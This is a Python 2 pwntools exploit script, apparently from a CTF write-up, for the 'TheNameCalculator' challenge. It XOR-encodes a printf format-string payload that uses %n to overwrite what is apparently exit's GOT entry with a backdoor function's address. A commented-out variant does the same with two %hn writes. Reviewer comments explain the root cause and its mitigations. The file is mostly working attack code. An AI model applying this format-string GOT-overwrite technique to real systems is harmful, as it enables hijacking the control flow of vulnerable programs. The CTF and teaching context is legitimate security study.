
```
from pwn import *
# author: conghiaa [email protected]
# The server's reply is very large, so pipe the script into nc and save the output to a file:
#   python TheNameCalculator.py | nc chal.noxale.com 5678 > res.t
# Then read the flag from the end of that file: tail --bytes=500 ./res.t
def decode(s):
    """XOR every overlapping 4-byte window of s with a fixed 32-bit key.

    Windows are processed from the last one (offset len(s) - 4) down to
    offset 0, moving one byte at a time, so each pass sees bytes already
    rewritten by the passes to its right. Strings shorter than 4 bytes are
    returned unchanged.

    u32/p32 are the pwntools helpers (little-endian, 32-bit by default).

    NOTE(review): presumably this pre-applies the inverse of a transform the
    target runs over the second name before using it, so that the intended
    text reappears on the server side. The binary is not shown here; confirm.
    """
    key = 0x5f7b4153
    offset = len(s) - 4
    while offset >= 0:
        tail = offset + 4
        # Unpack the window, mask it, and splice the 4 packed bytes back in.
        masked = p32(u32(s[offset:tail]) ^ key)
        s = s[:offset] + masked + s[tail:]
        offset -= 1
    return s

# def padding(s):
# if len(s)%4 == 0:
# return ""
# else:
# return 'X'*(4 - len(s)%4)

# Python 2 script: builds the two inputs the challenge asks for and prints
# them as a single blob on stdout.

# Address that gets overwritten. NOTE(review): the original calls it `exit`
# and 0x0804a0xx is the usual .got.plt range of a non-PIE i386 binary, so
# this is presumably exit's GOT entry. Confirm against the binary.
exit_slot = 0x0804a024
backdoor = 0x08048596  # superSecretFunc

# First-asked name: 0x20 bytes in total, 'X' filler followed by a packed
# 32-bit constant. NOTE(review): presumably the trailing word lands on a value
# the program checks before it asks for the second name. Not visible here.
magic = p32(0x6a4b825)
first_name = 'X' * (0x20 - len(magic)) + magic

# Second name, used by the target as a printf-style format string:
#   p32(exit_slot)     4 bytes of output, and the pointer that %12$n uses
#   %<backdoor - 4>x   pads the output so the running count equals backdoor
#   %12$n              stores that count at the address in argument 12
# Argument 12 is presumably where the start of this buffer sits on the stack;
# the alternative below derives its later index from the same base of 12.
#
# Defender view: the root cause is user-controlled text reaching printf as the
# format argument; printf("%s", buf) removes it and -Wformat-security flags the
# pattern at build time. Full RELRO (-Wl,-z,relro,-z,now) would make a GOT
# slot read-only, and _FORTIFY_SOURCE=2 makes glibc reject %n in a writable
# format string.
second_name = p32(exit_slot) + '%{}x%12$n'.format(backdoor - 4)

# Alternative kept from the author: two 16-bit writes (%hn) instead of one
# 32-bit write, which keeps the printed output small.
# second_name = p32(exit_slot + 2) + '%{}x'.format(0x0804 - 4) + '%12$hn'  # write 0x804
# pad = padding(second_name)
# second_name += pad
# second_name += p32(exit_slot) + '%{}x'.format(0x8596 - 0x804 - len(pad) - 4) + '%{}$hn'.format(len(second_name)/4 + 12)  # write 0x8596
# Author's note: this variant does not work because the target limits how many
# characters it reads; placing the exit address in the first-asked name gets
# around that limit.

# Only the second name goes through decode(); the first is sent as-is.
payload = first_name + decode(second_name)
print payload
```